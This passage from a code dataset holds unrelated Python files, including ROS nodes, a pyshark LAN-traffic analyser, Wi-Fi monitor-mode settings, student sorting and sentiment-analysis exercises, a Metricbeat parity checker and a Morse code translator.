mcnemar_test(methodA_res, methodB_res)\n print(\"%s vs. %s dataset = %s\" % (methodA, methodB, dataset))\n print(\"mcnemar's test: statistic=%.3f, p-value=%.3f\" % (test_result[0], test_result[1]))\n","sub_path":"code/Mtest.py","file_name":"Mtest.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"65254241","text":"############################################################################## \n# BSD 3-Clause License\n# Copyright (c) 2021, Institut de Robotica i Informatica Industrial (CSIC-UPC)\n# All rights reserved. \n##############################################################################\n\nimport rospy\nimport dynamic_reconfigure.client\nfrom std_msgs.msg import Bool\n\n\nclass DisturbanceTriggerNode():\n def __init__(self, rate):\n rospy.init_node('disturbance_trigger')\n\n self.rate = rospy.Rate(rate)\n\n self.dynRecClient = dynamic_reconfigure.client.Client(\"/\" + rospy.get_namespace() + \"/mpc_controller\",\n config_callback=self.callbackStartController)\n\n self.disturbanceStart = rospy.get_param(rospy.get_namespace() + \"/disturbance_start\", 2.0)\n self.disturbanceDuration = rospy.get_param(rospy.get_namespace() + \"/disturbance_duration\", 2.0)\n\n self.timerDisturbanceTrigger = rospy.Timer(rospy.Duration(0.1), self.callbackDisturbanceTrigger)\n self.disturbanceTriggerPub = rospy.Publisher(\"/disturbance_enable\", Bool, queue_size=1)\n self.controllerStartTime = rospy.Time.now()\n\n def callbackStartController(self, config):\n self.controllerStarted = config.start_mission\n if self.controllerStarted:\n self.controllerStartTime = rospy.Time.now()\n\n def callbackDisturbanceTrigger(self, event):\n msg = Bool()\n msg.data = False\n if (rospy.Time.now() - self.controllerStartTime).to_sec() > self.disturbanceStart and (\n rospy.Time.now() - self.controllerStartTime\n ).to_sec() < self.disturbanceDuration + self.disturbanceStart and self.controllerStarted:\n msg.data = True\n\n self.disturbanceTriggerPub.publish(msg)\n\n\nif __name__ == '__main__':\n node = DisturbanceTriggerNode(10)\n\n try:\n while not rospy.is_shutdown():\n node.rate.sleep()\n\n except rospy.ROSInterruptException:\n pass\n","sub_path":"eagle_mpc_simulator/scripts/disturbance_trigger.py","file_name":"disturbance_trigger.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"200241076","text":"import os\nimport vtktools\nimport numpy as np\nimport matplotlib.pyplot as plt\npath='D:\\\\Desktop\\\\Dissertation\\\\von-karman\\\\circledata'\nf_list = os.listdir(path) # all files in path\nvtu_num = 0\nfor i in f_list:\n # os.path.splitext(os.listdir(path)[0]) will give filename and extension\n \tif os.path.splitext(i)[1] == '.vtu':\n \t\tvtu_num = vtu_num+1\nprint(vtu_num)\n \t\nfor n in range(vtu_num): # for everyfile \n\t\tfilename = path + \"/circle-2d-drag_\" + str(n)+ \".vtu\"# name of vtu files\n\t\tdata = vtktools.vtu(filename)\n\t\t\n\t\t\n\t\tuvw = data.GetVectorField('Velocity')\n\t\t\n\t\tui = np.hsplit(uvw,3)[0].T #velocity of x axis\n\t\tvi = np.hsplit(uvw,3)[1].T #velocity of y axis\n\t\twi = np.hsplit(uvw,3)[2].T #velocity of z axis\n\t\tveli = np.hstack((ui,vi,wi)) #combine all into 1-d array\n\t\tprint(n)\n\t\tvel = veli if n==0 else np.vstack((vel,veli))\nw = vel[:,int(vel.shape[1]/3)*2:]\noutputs = vel[:,:int(vel.shape[1]/3)*2] if np.all(w) == 0 else vel\nnp.save('Velocity(AE-64).npy',outputs)","sub_path":"4. dataset generation/circledata/res.py","file_name":"res.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"352882563","text":"# encoding: UTF-8\n#Blanca Flor Cldern Vzquez\n#Mezclador de color\n\n\ndef combinarColores(color1,color2):\n if color1== \"azul\" or color1== \"rojo\" or color1== \"amarillo\":\n if color2== \"azul\" or color2== \"rojo\" or color2== \"amarillo\":\n if color1== \"azul\" and color2== \"azul\" :\n color= \"azul\"\n elif color2== \"rojo\" and color1== \"rojo\":\n color =\"rojo\"\n elif color1== \"amarillo\" and color2== \"amarillo\":\n color =\"amarillo\"\n elif color1== \"azul\" and color2== \"rojo\":\n color =\"violeta\"\n elif color1== \"azul\" and color2== \"amarillo\":\n color =\"verde\"\n elif color2== \"azul\" and color1== \"rojo\":\n color=\"violeta\"\n elif color2== \"azul\" and color1== \"amarillo\":\n color=\"verde\"\n elif color2== \"rojo\" and color1== \"amarillo\":\n color=\"naranja\"\n elif color1==\"amarillo\" and color2==\"rojo\":\n color=\"naranja\"\n \n else:\n color= \"error, ingresa bien tus datos\"\n else:\n color= \"error, ingresa bien tus datos\"\n \n return color\n \n\n\ndef main():\n \n color1=input(\"ingresa el primer número de color que desees combinar(rojo, amarillo o azul)\")\n color2=input(\"ingresa el segundo numero de color que desees combinar(rojo, amarillo o azul)\")\n colora1=color1.lower()\n colora2=color2.lower()\n colorResultante=combinarColores(colora1,colora2)\n print (colorResultante)\n\nmain()\n","sub_path":"combinación de colores.py","file_name":"combinación de colores.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"31526449","text":"import pyshark\nfrom pyshark import *\nfrom pyshark.packet.packet import Packet\nimport sys\nfrom classFrames import NetworkLAN\nfrom DropBox_utils import DBlspDISC\n\n\n\n\nif len(sys.argv) < 4:\n print(\"invalid usage\")\n print(\"\\tUsage: python3 run_test.py <ego_output_path> <printer_file> <Folder_path> <filename_1> <filename_2> ... \")\n print(\"\\tNote that filenames are the name of files resided in Folder_path\")\n exit(1)\n\n\nego_path = sys.argv[1]\nprinter_file = sys.argv[2]\nfolder:str= sys.argv[3]\nfiles = sys.argv[4:]\n# folder :str='/root/captures/'\n\n# files:list=['cs_general_fixed.pcap']\n# files:list=['CNR_Big_capture.pcap']\n# files:list=['medium.pcap']\n#files:list=['cs_medium.pcap']\n# files:list=['for_debug.pcap']\n# files:list=['for_debug_cs.pcap']\n# printer_file = 'CS_printer_query_new'\n\n# folder :str='/root/captures/outdir/'\n# files:list=['CNR_chunk_00000_20190222172518.pcap',\n# 'CNR_chunk_00002_20190225101908.pcap',\n# 'CNR_chunk_00004_20190227235120.pcap',\n# 'CNR_chunk_00001_20190224014742.pcap',\n# 'CNR_chunk_00003_20190226175640.pcap',\n# 'CNR_chunk_00005_20190301070739.pcap',\n# ]\n# files :list = ['CNR_chunk_00005_20190301070739.pcap']\n\n\n\nnet=NetworkLAN()\n\n\n\nnet.active_probing()\n\n\nfor file in files:\n print('###################### ',file,' #######################')\n #First we have to allocate slots\n net.form_time_slots(folder+file)\n # collect mDNS infos\n cap:FileCapture=pyshark.FileCapture(\n input_file=folder+file,\n keep_packets=False,\n use_json=False\n )\n # cap.set_debug()\n\n for pkt in cap:\n\n # pkt_list.setdefault(file,[])\n #\n # pkt_list[file].append(pkt)\n\n if 'eth' in pkt:\n # collect mdns infos\n if 'mdns' in pkt:\n net.extract_mDNS_info(pkt)\n # collect Browser infos\n elif 'browser' in pkt:\n net.extract_Browser_info(pkt)\n # collect DHCP infos\n elif 'bootp' in pkt or 'dhcpv6' in pkt:\n net.extract_DHCP_info(pkt)\n #regardless of the protocol of\n\n cap.close()\n\n\n\n\nfor file in files:\n # collect Dropbox infos\n cap: FileCapture = pyshark.FileCapture(\n input_file=folder + file,\n keep_packets=False,\n use_json=True,\n display_filter=\"db-lsp-disc\"\n )\n\n for pkt in cap:\n net.extract_DB_infos_old(pkt)\n\n cap.close()\n\n # collect nbns and llmnr infos\n cap: FileCapture = pyshark.FileCapture(\n input_file=folder + file,\n keep_packets=False,\n # use_json=True,\n display_filter=\"llmnr or nbns or arp\"\n )\n\n for pkt in cap:\n if 'llmnr' in pkt:\n net.extract_llmnr_infos(pkt)\n elif 'nbns' in pkt:\n net.extract_nbns_infos(pkt)\n elif 'arp' in pkt:\n net.extract_ARP_Links(pkt)\n\n# show linked devices\nnet.extract_DB_links()\n\n# Online network probing\n\nnet.extract_offline_snmp_ip(printer_file)\n# net.extract_offline_snmp_mac()\n#calculating link weights\nnet.aggregate_links()\n\n#print snapshot of the network\nnet.printAll(file)\n# net.print_browser_inf()\n\nnet.ego_analysis(ego_path)\n#net.all_kind_protocol()\n#net.all_local_alias()\n\nprint('End')\n","sub_path":"src/run_test.py","file_name":"run_test.py","file_ext":"py","file_size_in_byte":3251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"343775139","text":"import operator\nimport re;\nimport nltk;\nimport numpy as np;\nimport sys\n#np.set_printoptions(threshold=sys.maxsize)\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.linear_model import LogisticRegression\n\n\ndef regexpr(text):\n regexp=re.findall(r\"\\bnever\\b|\\bnot\\b|\\bno\\b|\\bcannot\\b|\\b[a-zA-Z]+n't\\b\",text)\n\n return regexp\n\nfeature_dict={}\n\n\ndef load_corpus(corpus_path):\n\n li=[]\n with open(corpus_path, 'r',encoding='latin-1') as infile:\n data = infile.readlines()\n for i in data:\n\n text = list(i.split(\"\\t\"))\n snippet=text[0]\n label=(int)(text[1])\n li.append((snippet,label))\n\n return li\n\nList=[]\nvocab=set()\ndef tokenize(snippet):\n\n snippet=re.sub(r\"(^|\\s)(')([^']+?)(')($|\\s)\", r\"\\1\\2 \\3 \\4 \\5\", snippet)\n snippet=snippet.split()\n tagged=tag_edits(snippet)\n List=(tag_negation(tagged))\n return List\n\ndef tag_edits(tokenized_snippet):\n start=end=0\n for i in range(len(tokenized_snippet)):\n if '[' in tokenized_snippet[i]:\n start=i\n if ']' in tokenized_snippet[i]:\n end=i\n break\n if start!=end:\n for i in range(start,end+1):\n if i==start:\n tokenized_snippet[i]=tokenized_snippet[i].replace(\"[\",\"\")\n elif i==end:\n tokenized_snippet[i] = tokenized_snippet[i].replace(\"]\", \"\")\n\n if tokenized_snippet[i]==\"\":\n tokenized_snippet.remove(\"\")\n tokenized_snippet[i]='EDIT_'+tokenized_snippet[i]\n return (tokenized_snippet)\n\n # while(1):\n # if ']' in tokenized_snippet[i]:\n # break;\n # tokenized_snippet[i]='EDIT_'+tokenized_snippet[i];\n # print(tokenized_snippet)\n\nstop_tag_words={\"but\",\"however\",\"nevertheless\",\".\",\"?\",\"!\"}\n\ndef tag_negation(tokenized_snippet):\n copy=tokenized_snippet[:]\n #print(copy)\n #print(tokenized_snippet)\n for i in range(len(tokenized_snippet)):\n if \"EDIT_\" in tokenized_snippet[i]:\n tokenized_snippet[i] = tokenized_snippet[i].replace(\"EDIT_\", \"\")\n\n wordpos=nltk.pos_tag(tokenized_snippet)\n\n\n List_wordpos=list(wordpos)\n\n\n for i in range(len(copy)):\n if \"EDIT_\" in copy[i]:\n li=list(List_wordpos[i])\n li[0]=\"EDIT_\"+li[0]\n List_wordpos[i] = tuple(li)\n\n\n #print(List_wordpos)\n b=False\n\n for i in range(len(List_wordpos)):\n # print(i)\n if regexpr(List_wordpos[i][0])!=[]:\n\n\n b=True\n if i+1<len(List_wordpos) :\n if List_wordpos[i+1][0]==\"only\":\n b=False\n continue\n if (List_wordpos[i][0] in stop_tag_words)|(List_wordpos[i][1] in['JJR','RBR']):\n # print()\n b=False\n if b==True:\n li = list(List_wordpos[i])\n li[0] = \"NOT_\" + li[0]\n List_wordpos[i] = tuple(li)\n\n\n return (List_wordpos)\n\n #nltk.pos_tag()\n\n\n\ndef get_features(preprocessed_snippet):\n v3=score_snippet(preprocessed_snippet,dal)\n feature_vector=np.zeros(len(feature_dict)+3)\n #print(feature_vector)\n for i in preprocessed_snippet:\n if \"EDIT_\" not in i[0]:\n if i[0] in feature_dict:\n\n num=feature_dict.get(i[0])\n feature_vector[num]=feature_vector[num]+1\n length=len(feature_vector)\n\n\n feature_vector[-3] = v3[0]\n feature_vector[-2] = v3[1]\n feature_vector[-1] = v3[2]\n\n return feature_vector\n\ndef normalize(X):\n shp=X.shape\n print(shp)\n #return X\n for i in range(shp[1]):\n\n max=X[np.argmax(X[:,i])][i]\n min=X[np.argmin(X[:,i ])][i]\n # print(max,\" \",min)\n #print(X[min][i])\n for j in range(shp[0]):\n f=X[j][i]\n if max==min:\n X[j][i]=f-min\n else:\n\n X[j][i]=(f-min)/(max-min)\n\n\n\n return X\n\n\ndef top_features(clf1,k):\n # a = []\n # c = []\n # print(clf1.coef_)\n List_wt = (clf1.coef_).tolist()[0]\n\n List_idx = []\n\n for i in range(len(List_wt)):\n List_idx.append(tuple((i,List_wt[i])))\n\n\n\n #print(List_idx)\n tup_wt_desc=sorted(List_idx, key=lambda x: abs(x[1]),reverse=True)\n\n # print(tup_wt_desc)\n #List_wt_desc=list(tup_wt_desc)\n List_wt_desc=[]\n\n for i in range(len(tup_wt_desc)):\n Li=[]\n for key,v in feature_dict.items():\n if v==tup_wt_desc[i][0]:\n Li.append(key)\n if len(Li)==0:\n if tup_wt_desc[i][0]==len(feature_dict):\n Li.append(\"activeness_dal\")\n if tup_wt_desc[i][0] == len(feature_dict) + 1:\n Li.append(\"evaluation_dal\")\n if tup_wt_desc[i][0] == len(feature_dict) + 2:\n Li.append(\"imager_dal\")\n Li.append(tup_wt_desc[i][1])\n List_wt_desc.append(tuple(Li))\n #print(k,\" \",type(k))\n r_list=[]\n for i in range(k):\n print(List_wt_desc[i])\n r_list.append(List_wt_desc[i])\n return r_list\n\n\n\n\ndef load_dal(dal_path):\n dal_dict={}\n with open(dal_path, 'r', encoding='latin-1') as infile:\n next(infile)\n\n data = infile.readlines()\n for i in data:\n text = list(i.split(\"\\t\"))\n\n dal_dict[text[0]]=tuple((float(text[1]),float(text[2]),(float)(text[3])))\n\n return dal_dict\n\n\ndef score_snippet(preprocessed_snippet, dal):\n #print(preprocessed_snippet)\n li_act=[]\n li_pl=[]\n li_img=[]\n for i in preprocessed_snippet:\n if \"EDIT_\" not in i[0]:\n if \"NOT_\" in i[0]:\n key = i[0].replace(\"NOT_\", \"\")\n if key in dal:\n val=dal[key]\n li_act.append(-1*val[0])\n li_pl.append(-1*val[1])\n li_img.append(-1*val[2])\n else:\n li_act.append(0)\n li_pl.append(0)\n li_img.append(0)\n\n else :\n key = i[0]\n if i[0] in dal:\n val=dal[key]\n li_act.append(val[0])\n li_pl.append(val[1])\n li_img.append(val[2])\n else:\n\n li_act.append(0)\n li_pl.append(0)\n li_img.append(0)\n\n\n\n # print(li_act)\n # print(li_pl)\n # print(li_img)\n return (sum(li_act)/len(li_act),sum(li_pl)/len(li_pl),sum(li_img)/len(li_img))\n\n\n\n\n\n\ndef evaluate_predictions(Y_pred, Y_true):\n tp=fp=fn=0\n for i in range(len(Y_true)):\n if ((Y_pred[i]) == 1) & ((Y_true[i] )== 1):\n tp=tp+1\n if ((Y_true[i])==0 )& ((Y_pred[i])==1):\n fp=fp+1\n if ((Y_true[i])==1) & ((Y_pred[i])==0):\n fn=fn+1\n print(tp,\" \",fp, \" \",fn)\n precision=(float)(tp/(tp+fp))\n recall = (float)(tp / (tp + fn))\n f_measure = (float)(2*precision*recall/(precision+recall))\n print(precision, \" \", recall, \" \", f_measure)\n return (precision,recall,f_measure)\n\n\ndal=load_dal(\"/Users/sravyakurra/Desktop/NLP/HW@2/dict_of_affect.txt\")\nLi=load_corpus(\"/Users/sravyakurra/Desktop/NLP/HW@2/train.txt\")\n#print(len(Li))\nfor i in Li:\n #print(i)\n\n List=tokenize(i[0])\n\n\n index=len(feature_dict)\n for i in List:\n if \"EDIT_\" not in i[0]:\n if i[0] not in feature_dict:\n feature_dict[i[0]] = index\n index = index + 1\n #length=len(feature_dict)\n\nX_train=np.empty(shape=(len(Li),len(feature_dict)+3))\nY_train=np.empty(shape=len(Li))\n\nfor i in range(len(Li)):\n #print(Li[i])\n List = tokenize(Li[i][0])\n# score_snippet(List,dal)\n X_train[i]=get_features(List)\n Y_train[i]=Li[i][1]\n# for i in range(len(Li)):\n# #print(Li[i])\n# print(X_train[i],\":\",Y_train[i])\n\nnormalized_X=(normalize(X_train))\nclf = GaussianNB()\nclf.fit(normalized_X, Y_train)\nclf_lr=LogisticRegression()\nclf_lr.fit(normalized_X, Y_train)\n\n\nLi_test=load_corpus(\"/Users/sravyakurra/Desktop/NLP/HW@2/test.txt\")\nX_test=np.empty(shape=(len(Li_test),len(feature_dict)+3))\nY_test=np.empty(shape=len(Li_test))\n\n\nfor i in range(len(Li_test)):\n #print(Li[i])\n List = tokenize(Li_test[i][0])\n\n X_test[i]=get_features(List)\n Y_test[i] = Li_test[i][1]\n#print(X_test)\n#print(\"hiii\")\n\nnormalized_Xtest = (normalize(X_test))\n\n#Y_pred=clf.predict(normalized_Xtest)\nY_pred_lr=clf_lr.predict(normalized_Xtest)\n#print(Y_pred)\n#print(Y_test)\n\n\nevaluate_predictions(Y_pred_lr,Y_test)\n\nprint(\"top featurtes:\",top_features(clf_lr,10))","sub_path":"Sentiment Analysis/Q4_Sentiment.py","file_name":"Q4_Sentiment.py","file_ext":"py","file_size_in_byte":8543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"59339667","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# @Time : 2018/1/25 23:38\r\n# @Author : Kevin Liu\r\n# @Site : \r\n# @File : cut.py\r\n# @Software: PyCharm\r\n\r\nimport jieba.analyse\r\nfrom visualization.dataAnalysis.mongoclient import client\r\n\r\n\r\ndef da_for_wordcloud():\r\n datas = client.find_for_pyecharts({'keyword': 'python'}, ['detail'])\r\n detail_string = ''.join(datas['detail'])\r\n seg_list = jieba.analyse.extract_tags(detail_string, topK=20, withWeight=True, allowPOS=('eng', 'n'))\r\n return list(zip(*seg_list))\r\n","sub_path":"visualization/dataAnalysis/cut.py","file_name":"cut.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"515567927","text":"#!usr/bin/env python3\n\nimport rospy\nfrom std_msgs.msg import String\n\ndef simple_cb(val): #инициализируем функцию callback c именем simple_cb\n print(val)\n\ndef main():\n rospy.init_node('subscriber_node') #инициальизируем данную ноду с именем subscriber_node\n rospy.Subscriber('/talker', String, simple_cb) #создаём сабскрайбер, который принимает значения типа String из топика с именем /talker и потом отправляет эти данные в функцию callback с именем simple_cb\n rospy.spin() #заставляем функцию main работать бесконечно циклично\n\nif __name__ == '__main__':\n main()","sub_path":"ros_simple_nodes/scripts/Subscriber.py","file_name":"Subscriber.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"604084957","text":"# TO-DO: Complete the selection_sort() function below \n\ndef selection_sort( arr ):\n # loop through n-1 elements\n for i in range(0, len(arr) - 1):\n cur_index = i\n smallest_index = cur_index\n # TO-DO: find next smallest element (hint, can do in 3 loc - lines of code) \n # First, I need to iterate through the elements that remain in the arr\n for x in range(smallest_index + 1, len(arr)):\n # Second, I need to check if the element is smaller than the currently smallest\n if arr[x] < arr[smallest_index]:\n # Third, if this statement is True, I will need to set the new index to be the smallest\n smallest_index = x\n # TO-DO: swap the arr\n arr[cur_index], arr[smallest_index] = arr[smallest_index], arr[cur_index]\n\n return arr\n\n\n# TO-DO: implement the Bubble Sort function below\n\ndef bubble_sort( arr ):\n # Looping through each element in the array\n for i in range(len(arr) - 1):\n # Looping through the remaining elements\n for x in range(len(arr) - 1 - i):\n # comparing this current element to the one to the right, if larger than we swap places(indices)\n if arr[x] > arr[x + 1]:\n arr[x], arr[x + 1] = arr[x + 1], arr[x]\n\n return arr\n\n\n# STRETCH: implement the Count Sort function below\n'''\n\nCounting sort is a sorting algorithm that sorts the elements of an array by counting the number of occurrences of each unique element in the array. The count is stored in an auxiliary array and the sorting is done by mapping the count as an index of the auxiliary array.\n\n'''\n\n# Looking in the test_iterative.py, in arr4, the range is set to 200 so I will sed the max to 200\n\ndef count_sort( arr, maximum=200 ):\n # iterate over array\n for i in arr:\n # checking to see if there is a negative element in the array; if so, return the statement in the test file\n if arr[i] < 0:\n return \"Error, negative numbers not allowed in Count Sort\"\n # setting everything to zero\n count = [0] * (maximum + 1)\n arr_set = [0] * len(arr)\n\n for i in arr:\n count[i] +=1\n\n for i in range(1, len(count)):\n count[i] += count[i - 1]\n \n for i in range(len(arr) - 1, -1, -1):\n arr_set[count[arr[i]] - 1] = arr[i]\n count[arr[i]] -= 1\n\n return arr_set","sub_path":"src/iterative_sorting/iterative_sorting.py","file_name":"iterative_sorting.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"337511209","text":"import os\nimport sys\nimport json\nimport pprint\nfrom dictdiffer import diff\n\nallowed_insertions_in_metricbeat_docs = [\n # 'path.to.field'\n 'service',\n '@timestamp',\n 'agent',\n 'event',\n 'host',\n 'ecs',\n 'metricset'\n]\n\nallowed_deletions_from_metricbeat_docs = [\n # 'path.to.field'\n 'source_node',\n]\n\ndef log_ok(message):\n sys.stdout.write(\"OK: \" + message + \"\\n\")\n\ndef log_error(message):\n sys.stderr.write(\"ERROR: \" + message + \"\\n\")\n\ndef log_parity_error(message):\n log_error(message)\n \ndef check_usage():\n if (len(sys.argv) < 3):\n log_error(\"Usage: python docs_compare.py /path/to/legacy/docs /path/to/metricbeat/docs\\n\")\n sys.exit(1)\n\ndef get_legacy_docs_path():\n legacy_docs_path = sys.argv[1]\n if not os.path.exists(legacy_docs_path):\n log_error(\"Legacy-indexed documents path does not exist: \" + legacy_docs_path + \"\\n\")\n sys.exit(11)\n return legacy_docs_path\n\ndef get_metricbeat_docs_path():\n metricbeat_docs_path = sys.argv[2]\n if not os.path.exists(metricbeat_docs_path):\n log_error(\"Metricbeat-indexed documents path does not exist: \" + metricbeat_docs_path + \"\\n\")\n sys.exit(12)\n return metricbeat_docs_path\n\ndef get_doc_types(docs_path):\n files = os.listdir(docs_path)\n doc_types = []\n for doc_type_filename in (f for f in files if os.path.isfile(os.path.join(docs_path, f))):\n name, _ext = doc_type_filename.split('.')\n doc_types.append(name)\n return doc_types\n\ndef check_num_doc_types(legacy_doc_types, metricbeat_doc_types):\n if len(legacy_doc_types) > len(metricbeat_doc_types):\n diff_elements = set(legacy_doc_types) - set(metricbeat_doc_types)\n log_parity_error(\"Found more legacy-indexed document types than metricbeat-indexed document types.\\n \\\n Document types indexed by legacy collection but not by Metricbeat collection: {}\".format(pprint.pformat(diff_elements)))\n\ndef get_doc(docs_path, doc_type):\n with open(os.path.join(docs_path, doc_type + \".json\")) as f:\n data = f.read()\n return json.loads(data)\n\ndef remove_field(doc, field):\n field_path_segments = field.split(\".\")\n last_segment = field_path_segments.pop()\n\n d = doc\n for segment in field_path_segments:\n if segment in d:\n d = d[segment]\n\n d.pop(last_segment, None)\n\ndef remove_optional_fields(doc, fields):\n for field in fields:\n remove_field(doc, field)\n\ndef has_insertions_recursive(obj):\n obj_type = type(obj)\n\n if obj_type is dict:\n keys = obj.keys()\n if '$insert' in keys:\n return True\n\n for key in keys:\n if has_insertions_recursive(obj[key]):\n return True\n elif obj_type is list:\n for el in obj:\n if has_insertions_recursive(el):\n return True\n else:\n return False\n\ndef has_deletions_recursive(obj):\n obj_type = type(obj)\n\n if obj_type is dict:\n keys = obj.keys()\n if '$delete' in keys:\n return True\n\n for key in keys:\n if has_deletions_recursive(obj[key]):\n return True\n elif obj_type is list:\n for el in obj:\n if has_deletions_recursive(el):\n return True\n else:\n return False\n\ndef make_diff_path(diff_path):\n if isinstance(diff_path, list):\n path = ''\n for item in diff_path:\n path = path + '.' + str(item)\n return path.strip('.')\n else:\n return diff_path\n\ndef check_diff(diff_item, allowed_diffs_in_metricbeat_docs):\n unexpected_diff_paths = []\n\n diff_parent_path = make_diff_path(diff_item[1])\n diff_children = diff_item[2]\n\n for diff_child in diff_children:\n diff_path = diff_parent_path + '.' + str(diff_child[0])\n diff_path = diff_path.strip('.')\n\n if diff_path not in allowed_diffs_in_metricbeat_docs:\n unexpected_diff_paths.append(diff_path)\n\n return unexpected_diff_paths\n\ndef check_parity(handle_special_cases = lambda t, i, m: None, allowed_insertions_in_metricbeat_docs_extra = [], allowed_deletions_from_metricbeat_docs_extra = []):\n allowed_insertions_in_metricbeat_docs.extend(allowed_insertions_in_metricbeat_docs_extra)\n allowed_deletions_from_metricbeat_docs.extend(allowed_deletions_from_metricbeat_docs_extra)\n\n check_usage()\n\n legacy_docs_path = get_legacy_docs_path()\n metricbeat_docs_path = get_metricbeat_docs_path()\n\n legacy_doc_types = get_doc_types(legacy_docs_path)\n metricbeat_doc_types = get_doc_types(metricbeat_docs_path)\n\n check_num_doc_types(legacy_doc_types, metricbeat_doc_types)\n\n num_errors = 0\n for doc_type in legacy_doc_types:\n legacy_doc = get_doc(legacy_docs_path, doc_type)\n metricbeat_doc = get_doc(metricbeat_docs_path, doc_type)\n\n handle_special_cases(doc_type, legacy_doc, metricbeat_doc)\n\n unexpected_insertions = []\n unexpected_deletions = []\n for diff_item in diff(legacy_doc, metricbeat_doc):\n diff_type = diff_item[0]\n\n if diff_type == 'add':\n unexpected_insertions.extend(check_diff(diff_item, allowed_insertions_in_metricbeat_docs))\n\n if diff_type == 'remove':\n unexpected_deletions.extend(check_diff(diff_item, allowed_deletions_from_metricbeat_docs))\n\n if len(unexpected_insertions) == 0 and len(unexpected_deletions) == 0:\n log_ok(\"Metricbeat-indexed doc for type='\" + doc_type + \"' has expected parity with legacy-indexed doc.\")\n continue\n\n if len(unexpected_insertions) > 0:\n for insertion in unexpected_insertions:\n log_parity_error(\"Metricbeat-indexed doc for type='\" + doc_type + \"' has unexpected insertion: \" + insertion)\n num_errors = num_errors + 1\n\n if len(unexpected_deletions) > 0:\n for deletion in unexpected_deletions:\n log_parity_error(\"Metricbeat-indexed doc for type='\" + doc_type + \"' has unexpected deletion: \" + deletion)\n num_errors = num_errors + 1\n\n print(\"*** Legacy-indexed doc for type='\" + doc_type + \"': ***\")\n print(legacy_doc)\n\n print(\"*** Metricbeat-indexed doc for type='\" + doc_type + \"': ***\")\n print(metricbeat_doc)\n\n if num_errors > 0:\n exit(100 + num_errors)\n","sub_path":"playbooks/monitoring/common/docs_compare_util.py","file_name":"docs_compare_util.py","file_ext":"py","file_size_in_byte":6143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"225392931","text":"import simple_draw as sd\n\n\nclouds_list_coord = [(0, 570, 50),\n (80, 570, 70),\n (150, 570, 40),\n (200, 570, 50),\n (270, 570, 40),\n ]\n\n\ndef draw_clouds():\n for coord in clouds_list_coord:\n sd.circle(center_position=sd.get_point(coord[0], coord[1]), radius=coord[2],\n width=0, color=sd.COLOR_WHITE)\n","sub_path":"lesson_005/draw_object/clouds.py","file_name":"clouds.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"48809843","text":"interface = 'wlo1'\nmonitor_enable = 'sudo service network-manager stop;sudo ifconfig wlo1 down;sudo iwconfig wlo1 mode monitor;sudo ifconfig wlo1 up'\nmonitor_disable = 'sudo ifconfig wlo1 down;sudo iwconfig wlo1 mode Managed;sudo ifconfig wlo1 up;sudo service network-manager start'\nchange_channel = 'iw dev wlo1 set channel %s'\nchannels = [6]\nsub_type_filter=[\"beacon\",\"probe-response\",\"qos-data\"]\nrssi_level_filter = -900\nlearning = False\nlearning_interval = 3\nexport_interval = 1\ngenerate_graph=True","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"93732198","text":"\"\"\"Překladač.\"\"\"\n# Mapování písmen abecedy na znaky Morseovy abecedy\nalphabetMorse = {\n \"a\": \".-\",\n \"b\": \"-...\",\n \"c\": \"-.-.\",\n \"d\": \"-..\",\n \"e\": \".\",\n \"f\": \"..-.\",\n \"g\": \"--.\",\n \"h\": \"....\",\n \"ch\": \"----\",\n \"i\": \"..\",\n \"j\": \".---\",\n \"k\": \"-.-\",\n \"l\": \".-..\",\n \"m\": \"--\",\n \"n\": \"-.\",\n \"o\": \"---\",\n \"p\": \".--.\",\n \"q\": \"--.-\",\n \"r\": \".-.\",\n \"s\": \"...\",\n \"t\": \"-\",\n \"u\": \"..-\",\n \"v\": \"...-\",\n \"w\": \".--\",\n \"x\": \"-..-\",\n \"y\": \"-.--\",\n \"z\": \"--..\"\n}\n\n# Mapování znaků Morseovy abecedy na písmena abecedy\nmorseAlphabet = {\n \".-\": \"a\",\n \"-...\": \"b\",\n \"-.-.\": \"c\",\n \"-..\": \"d\",\n \".\": \"e\",\n \"..-.\": \"f\",\n \"--.\": \"g\",\n \"....\": \"h\",\n \"----\": \"ch\",\n \"..\": \"i\",\n \".---\": \"j\",\n \"-.-\": \"k\",\n \".-..\": \"l\",\n \"--\": \"m\",\n \"-.\": \"n\",\n \"---\": \"o\",\n \".--.\": \"p\",\n \"--.-\": \"q\",\n \".-.\": \"r\",\n \"...\": \"s\",\n \"-\": \"t\",\n \"..-\": \"u\",\n \"...-\": \"v\",\n \".--\": \"w\",\n \"-..-\": \"x\",\n \"-.--\": \"y\",\n \"--..\": \"z\"\n}\n\n# Mezera\nspace = \" \"\n# Oddělovač znaků Morseovy abecedy\ncharSeparator = \"|\"\n\n\ndef isAlphabetTranslation():\n \"\"\"Funkce, která zajišťuje správný výběr překladu.\"\"\"\n print(\"Translate from:\")\n print(\"1 - Alphabet\")\n print(\"2 - Morse code\")\n while True:\n # Kontrola, jestli je 